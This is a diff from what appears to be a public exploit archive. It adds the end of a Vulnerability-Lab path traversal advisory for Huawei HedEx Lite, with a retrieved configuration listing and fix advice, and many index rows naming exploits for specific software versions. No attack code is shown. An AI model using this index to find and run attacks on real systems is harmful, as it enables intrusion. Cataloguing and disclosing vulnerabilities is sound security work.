+adts=MPEGVideo
+m2t=MPEGVideo
+m2ts=MPEGVideo
+m2v=MPEGVideo
+m4a=MPEGVideo
+m4v=MPEGVideo
+mod=MPEGVideo
+mov=MPEGVideo
+mp4=MPEGVideo
+mp4v=MPEGVideo
+mts=MPEGVideo
+ts=MPEGVideo
+tts=MPEGVideo
+[Drivers.32]
+OLEMessaging.64=$80,$5D,$D9,$A6,$A4,$18,$A8,$AD
+[ChannelDownmixer]
+p1.bIsMultichannel=0
+p1.wFormatTag=1
+p1.nChannels=2
+p1.dwChannelMask=63
+p1.wBitsPerSample=16
+p1.RequiredInputBitDepth=0
+p1.bRequireInputNumberOfChannels=0
+p1.RequiredInputNumberOfChannels=6
+p1.bRequireInputSamplerate=0
+p1.RequiredInputSamplerate=48000
+p1.bRaiseMeritAndSingleInstance=1
+p2.InputEnableBitmask=-1
+p2.OutputEnableBitmask=-1
+p2.bEnableInputGains=0
+p2.bEnableOutputGains=0
+p2.bEnableMasterVolume=0
+p2.MasterVolumeGain=100
+p2.I.FL=100
+p2.I.FR=100
+p2.I.FC=100
+p2.I.LF=100
+p2.I.BL=100
+p2.I.BR=100
+p2.I.FLC=100
+p2.I.FRC=100
+p2.I.BC=100
+p2.I.SL=100
+p2.I.SR=100
+p2.I.TC=100
+p2.I.TFL=100
+p2.I.TFC=100
+p2.I.TFR=100
+p2.I.TBL=100
+p2.I.TBC=100
+p2.I.TBR=100
+p2.I.bJoinFLFR=1
+p2.I.bJoinBLBR=1
+p2.I.bJoinFLCFRC=1
+p2.I.bJoinSLSR=1
+p2.I.bJoinTFLTFR=1
+p2.I.bJoinTBLTBR=1
+p2.O.FL=100
+p2.O.FR=100
+p2.O.FC=100
+p2.O.LF=100
+p2.O.BL=100
+p2.O.BR=100
+p2.O.FLC=100
+p2.O.FRC=100
+p2.O.BC=100
+p2.O.SL=100
+p2.O.SR=100
+p2.O.TC=100
+p2.O.TFL=100
+p2.O.TFC=100
+p2.O.TFR=100
+p2.O.TBL=100
+p2.O.TBC=100
+p2.O.TBR=100
+p2.O.bJoinFLFR=1
+p2.O.bJoinBLBR=1
+p2.O.bJoinFLCFRC=1
+p2.O.bJoinSLSR=1
+p2.O.bJoinTFLTFR=1
+p2.O.bJoinTBLTBR=1
+p3.bCustomMixMatrix=0
+CustomMixMatrixFilename=
+LastRegisteredVersion=20000
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be resolved by setting restricted accessable
+paths.  A whitelist or static paths configuration can be combined.
+An update is available on the huawei website provided by the
+manufacturer of the application via customer portal.
+
+
+Security Risk:
+==============
+The security risk of the path traversal web vulnerability in the
+download manager software is estimated as high.
+
+
+Credits & Authors:
+==================
+S.AbenMassaoud [Research Team] -
+https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index d8fd509ac..a180a7a21 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6763,6 +6763,8 @@ id,file,description,date,author,type,platform,port
 49083,exploits/windows/dos/49083.pl,"Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)",2020-11-19,"Vincent Wolterman",dos,windows,
 49105,exploits/multiple/dos/49105.py,"Pure-FTPd 1.0.48 - Remote Denial of Service",2020-11-26,xynmaps,dos,multiple,
 49119,exploits/linux/dos/49119.py,"libupnp 1.6.18 - Stack-based buffer overflow (DoS)",2020-11-27,"Patrik Lantz",dos,linux,
+49206,exploits/windows/dos/49206.txt,"TapinRadio 2.13.7 - Denial of Service (PoC)",2020-12-07,"Ismael Nava",dos,windows,
+49207,exploits/windows/dos/49207.txt,"RarmaRadio 2.72.5 - Denial of Service (PoC)",2020-12-07,"Ismael Nava",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10416,6 +10418,7 @@ id,file,description,date,author,type,platform,port
 49012,exploits/windows/local/49012.txt,"Motorola Device Manager 2.5.4 - 'MotoHelperService.exe' Unquoted Service Path",2020-11-09,"Angel Canseco",local,windows,
 49013,exploits/windows/local/49013.txt,"Motorola Device Manager 2.5.4 - 'ForwardDaemon.exe ' Unquoted Service Path",2020-11-09,"Angel Canseco",local,windows,
 49014,exploits/windows/local/49014.txt,"Realtek Andrea RT Filters 1.0.64.10 - 'AERTSr64.EXE' Unquoted Service Path",2020-11-09,"Erika Figueroa",local,windows,
+49015,exploits/windows/local/49015.txt,"Realtek Audio Service 1.0.0.55 - 'RtkAudioService64.exe' Unquoted Service Path",2020-11-09,"Erika Figueroa",local,windows,
 49016,exploits/windows/local/49016.txt,"MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
 49017,exploits/windows/local/49017.txt,"Magic Mouse 2 utilities  2.20 - 'magicmouse2service' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
 49018,exploits/windows/local/49018.txt,"iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path",2020-11-09,"Leslie Lara",local,windows,
@@ -11218,9 +11221,15 @@ id,file,description,date,author,type,platform,port
 49144,exploits/windows/local/49144.bat,"Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path",2020-12-01,"Metin Yunus Kandemir",local,windows,
 49147,exploits/windows/local/49147.txt,"aSc TimeTables 2021.6.2 - Denial of Service (PoC)",2020-12-02,"Ismael Nava",local,windows,
 49157,exploits/windows/local/49157.txt,"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path",2020-12-02,"Manuel Alvarez",local,windows,
+49158,exploits/windows/local/49158.txt,"Realtek Andrea RT Filters 1.0.64.7 - 'AERTSr64.EXE' Unquoted Service Path",2020-12-02,"Manuel Alvarez",local,windows,
 49179,exploits/windows/local/49179.cpp,"Microsoft Windows - Win32k Elevation of Privilege",2020-12-02,nu11secur1ty,local,windows,
 49191,exploits/windows/local/49191.txt,"IDT PC Audio 1.0.6499.0 - 'STacSV' Unquoted Service Path",2020-12-04,"Diego Cañada",local,windows,
 49195,exploits/multiple/local/49195.js,"Chromium 83 - Full CSP Bypass",2020-12-04,"Gal Weizman",local,multiple,
+49203,exploits/windows/local/49203.txt,"Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path",2020-12-07,"Mohammed Alshehri",local,windows,
+49205,exploits/windows/local/49205.txt,"Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path",2020-12-07,"Ismael Nava",local,windows,
+49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows,
+49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Thomas Sluyter",local,multiple,
+49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17886,6 +17895,7 @@ id,file,description,date,author,type,platform,port
 42787,exploits/hardware/remote/42787.txt,"FLIR Thermal Camera F/FC/PT/D - SSH Backdoor Access",2017-09-25,LiquidWorm,remote,hardware,
 42790,exploits/linux/remote/42790.txt,"Tiny HTTPd 0.1.0 - Directory Traversal",2017-09-26,"Touhid M.Shaikh",remote,linux,
 42793,exploits/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,remote,multiple,5858
+49210,exploits/windows/remote/49210.py,"Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow",2020-12-07,0rbz_,remote,windows,
 48816,exploits/windows/remote/48816.py,"Microsoft SQL Server Reporting Services 2016 - Remote Code Execution",2020-09-17,"West Shepherd",remote,windows,
 48842,exploits/hardware/remote/48842.py,"Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow",2020-10-01,LiquidWorm,remote,hardware,
 48954,exploits/hardware/remote/48954.txt,"Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root",2020-10-27,LiquidWorm,remote,hardware,
@@ -18326,6 +18336,9 @@ id,file,description,date,author,type,platform,port
 49127,exploits/windows/remote/49127.py,"YATinyWinFTP - Denial of Service (PoC)",2020-11-30,strider,remote,windows,
 49169,exploits/multiple/remote/49169.sh,"Ksix Zigbee Devices - Playback Protection Bypass (PoC)",2020-12-02,"Alejandro Vazquez Vazquez",remote,multiple,
 49176,exploits/linux/remote/49176.txt,"Mitel mitel-cs018 - Call Data Information Disclosure",2020-12-02,"Andrea Intilangelo",remote,linux,
+49216,exploits/windows/remote/49216.py,"SmarterMail Build 6985 - Remote Code Execution",2020-12-09,1F98D,remote,windows,
+49217,exploits/windows/remote/49217.py,"Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH)",2020-12-09,"Andrés Roldán",remote,windows,
+49218,exploits/windows/remote/49218.txt,"Huawei HedEx Lite 200R006C00SPC005 - Path Traversal",2020-12-09,Vulnerability-Lab,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -38777,7 +38790,7 @@ id,file,description,date,author,type,platform,port
 39030,exploits/php/webapps/39030.txt,"BloofoxCMS - '/bloofox/admin/index.php?Username' SQL Injection",2014-01-17,AtT4CKxT3rR0r1ST,webapps,php,
 39031,exploits/php/webapps/39031.html,"BloofoxCMS - '/admin/index.php' Cross-Site Request Forgery (Add Admin)",2014-01-17,AtT4CKxT3rR0r1ST,webapps,php,
 39032,exploits/php/webapps/39032.txt,"BloofoxCMS 0.5.0 - 'fileurl' Local File Inclusion",2014-01-17,AtT4CKxT3rR0r1ST,webapps,php,
-39033,exploits/php/webapps/39033.py,"Joomla! 1.5 < 3.4.5 - Object Injection 'x-forwarded-for' Header Remote Code Execution",2015-12-18,"Andrew McNicol",webapps,php,80
+39033,exploits/php/webapps/39033.py,"Joomla! 1.5 < 3.4.6 - Object Injection 'x-forwarded-for' Header Remote Code Execution",2015-12-18,"Andrew McNicol",webapps,php,80
 39034,exploits/php/webapps/39034.html,"Ovidentia maillist Module 4.0 - Remote File Inclusion",2015-12-18,bd0rk,webapps,php,80
 39099,exploits/php/webapps/39099.txt,"Rhino - Cross-Site Scripting / Password Reset",2014-02-12,Slotleet,webapps,php,
 39038,exploits/php/webapps/39038.txt,"pfSense 2.2.5 - Directory Traversal",2015-12-18,R-73eN,webapps,php,
@@ -43199,6 +43212,7 @@ id,file,description,date,author,type,platform,port
 48611,exploits/multiple/webapps/48611.txt,"WebPort 1.19.1 - Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple,
 48612,exploits/php/webapps/48612.txt,"WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,php,
 48642,exploits/linux/webapps/48642.sh,"BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI'  Remote Code Execution",2020-07-06,"Critical Start",webapps,linux,
+48614,exploits/hardware/webapps/48614.txt,"Eaton Intelligent Power Manager 1.6 - Directory Traversal",2020-06-22,"Emre ÖVÜNÇ",webapps,hardware,
 48615,exploits/php/webapps/48615.txt,"Responsive Online Blog 1.0 - 'id' SQL Injection",2020-06-23,"Eren Şimşek",webapps,php,
 48616,exploits/php/webapps/48616.txt,"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)",2020-06-23,BKpatron,webapps,php,
 48619,exploits/multiple/webapps/48619.txt,"BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting",2020-06-24,"William Summerhill",webapps,multiple,
@@ -43255,6 +43269,7 @@ id,file,description,date,author,type,platform,port
 48694,exploits/hardware/webapps/48694.txt,"UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin)",2020-07-26,LiquidWorm,webapps,hardware,
 48698,exploits/php/webapps/48698.txt,"WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download",2020-07-26,KBA@SOGETI_ESEC,webapps,php,
 48699,exploits/php/webapps/48699.sh,"WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)",2020-07-26,KBA@SOGETI_ESEC,webapps,php,
+48700,exploits/php/webapps/48700.txt,"PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting",2020-07-26,"Emre ÖVÜNÇ",webapps,php,
 48701,exploits/multiple/webapps/48701.txt,"Bludit 3.9.2 - Directory Traversal",2020-07-26,"James Green",webapps,multiple,
 48702,exploits/php/webapps/48702.txt,"LibreHealth 2.0.0 - Authenticated Remote Code Execution",2020-07-26,boku,webapps,php,
 48704,exploits/php/webapps/48704.py,"Online Course Registration 1.0 - Unauthenticated Remote Code Execution",2020-07-26,boku,webapps,php,
@@ -43324,6 +43339,7 @@ id,file,description,date,author,type,platform,port
 48787,exploits/php/webapps/48787.txt,"Daily Tracker System 1.0 - Authentication Bypass",2020-09-03,"Adeeb Shah",webapps,php,
 48788,exploits/php/webapps/48788.txt,"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)",2020-09-03,V1n1v131r4,webapps,php,
 49063,exploits/php/webapps/49063.txt,"Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php,
+49064,exploits/php/webapps/49064.txt,"Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities",2020-11-17,Vulnerability-Lab,webapps,php,
 49069,exploits/php/webapps/49069.txt,"Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting (Authenticated)",2020-11-18,ZwX,webapps,php,
 49070,exploits/multiple/webapps/49070.txt,"BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery",2020-11-18,"RedTeam Pentesting GmbH",webapps,multiple,
 49072,exploits/multiple/webapps/49072.txt,"PESCMS TEAM 2.3.2 - Multiple Reflected XSS",2020-11-19,icekam,webapps,multiple,
@@ -43391,6 +43407,7 @@ id,file,description,date,author,type,platform,port
 49162,exploits/multiple/webapps/49162.txt,"Online News Portal System 1.0 - 'Title' Stored Cross Site Scripting",2020-12-02,"Parshwa Bhavsar",webapps,multiple,
 49163,exploits/multiple/webapps/49163.txt,"Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass",2020-12-02,"Aditya Wakhlu",webapps,multiple,
 49164,exploits/php/webapps/49164.txt,"WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting",2020-12-02,"Hemant Patidar",webapps,php,
+49165,exploits/multiple/webapps/49165.txt,"Employee Record Management System 1.1 - Login Bypass SQL Injection",2020-12-02,"Anurag Kumar",webapps,multiple,
 49166,exploits/multiple/webapps/49166.txt,"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Add Artwork",2020-12-02,"Shahrukh Iqbal Mirza",webapps,multiple,
 49167,exploits/multiple/webapps/49167.txt,"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile",2020-12-02,"Shahrukh Iqbal Mirza",webapps,multiple,
 49168,exploits/multiple/webapps/49168.txt,"DotCMS 20.11 - Stored Cross-Site Scripting",2020-12-02,"Hardik Solanki",webapps,multiple,
@@ -43402,6 +43419,7 @@ id,file,description,date,author,type,platform,port
 49175,exploits/php/webapps/49175.txt,"Simple College Website 1.0 - 'page' Local File Inclusion",2020-12-02,Mosaaed,webapps,php,
 49177,exploits/php/webapps/49177.txt,"Car Rental Management System 1.0 - SQL Injection / Local File include",2020-12-02,Mosaaed,webapps,php,
 49178,exploits/php/webapps/49178.bash,"WordPress Plugin Wp-FileManager 6.8 - RCE",2020-12-02,"Mansoor R",webapps,php,
+49180,exploits/php/webapps/49180.txt,"User Registration & Login and User Management System 2.1 - Cross Site Request Forgery",2020-12-03,"Dipak Panchal",webapps,php,
 49181,exploits/php/webapps/49181.txt,"Coastercms 5.8.18 - Stored XSS",2020-12-03,"Hardik Solanki",webapps,php,
 49182,exploits/multiple/webapps/49182.txt,"EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass",2020-12-03,"Mayur Parmar",webapps,multiple,
 49184,exploits/multiple/webapps/49184.txt,"mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting",2020-12-03,"Sagar Banwa",webapps,multiple,
@@ -43418,3 +43436,18 @@ id,file,description,date,author,type,platform,port
 49198,exploits/php/webapps/49198.txt,"Laravel Nova 3.7.0 - 'range' DoS",2020-12-04,iqzer0,webapps,php,
 49199,exploits/php/webapps/49199.txt,"CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)",2020-12-04,"Eshan Singh",webapps,php,
 49202,exploits/php/webapps/49202.txt,"Zabbix 5.0.0 - Stored XSS via URL Widget Iframe",2020-12-04,"Shwetabh Vishnoi",webapps,php,
+49204,exploits/php/webapps/49204.txt,"Cyber Cafe Management System  Project (CCMS) 1.0 - Persistent Cross-Site Scripting",2020-12-07,"Pruthvi Nekkanti",webapps,php,
+49208,exploits/php/webapps/49208.txt,"Savsoft Quiz 5 - 'Skype ID' Stored XSS",2020-12-07,"Dipak Panchal",webapps,php,
+49209,exploits/php/webapps/49209.txt,"vBulletin 5.6.3 - 'group' Cross Site Scripting",2020-12-07,Vincent666,webapps,php,
+49212,exploits/php/webapps/49212.txt,"Online Bus Ticket Reservation 1.0 - SQL Injection",2020-12-08,"Sakshi Sharma",webapps,php,
+49215,exploits/php/webapps/49215.txt,"Employee Performance Evaluation System 1.0 - 'Task and Description' Persistent Cross Site Scripting",2020-12-08,"Ritesh Gohil",webapps,php,
+49219,exploits/multiple/webapps/49219.txt,"VestaCP 0.9.8-26 - 'LoginAs' Insufficient Session Validation",2020-12-09,Vulnerability-Lab,webapps,multiple,
+49220,exploits/multiple/webapps/49220.txt,"VestaCP 0.9.8-26 - 'backup' Information Disclosure",2020-12-09,Vulnerability-Lab,webapps,multiple,
+49222,exploits/php/webapps/49222.txt,"Task Management System 1.0 - 'First Name and Last Name' Stored XSS",2020-12-09,"Saeed Bala Ahmed",webapps,php,
+49223,exploits/php/webapps/49223.txt,"Task Management System 1.0 - Unrestricted File Upload to Remote Code Execution",2020-12-09,"Saeed Bala Ahmed",webapps,php,
+49224,exploits/php/webapps/49224.txt,"Task Management System 1.0 - 'id' SQL Injection",2020-12-09,"Saeed Bala Ahmed",webapps,php,
+49227,exploits/php/webapps/49227.txt,"Barcodes generator 1.0 - 'name' Stored Cross Site Scripting",2020-12-10,"Nikhil Kumar",webapps,php,
+49228,exploits/php/webapps/49228.txt,"OpenCart 3.0.3.6 - Cross Site Request Forgery",2020-12-10,"Mahendra Purbia",webapps,php,
+49229,exploits/jsp/webapps/49229.txt,"Openfire 4.6.0 - 'path' Stored XSS",2020-12-10,j5s,webapps,jsp,
+49230,exploits/php/webapps/49230.txt,"Library Management System 2.0 - Auth Bypass SQL Injection",2020-12-10,"Manish Solanki",webapps,php,
+49231,exploits/php/webapps/49231.txt,"WordPress Plugin Popup Builder 3.69.6 - Multiple Stored Cross Site Scripting",2020-12-10,"Ilca Lucian Florin",webapps,php,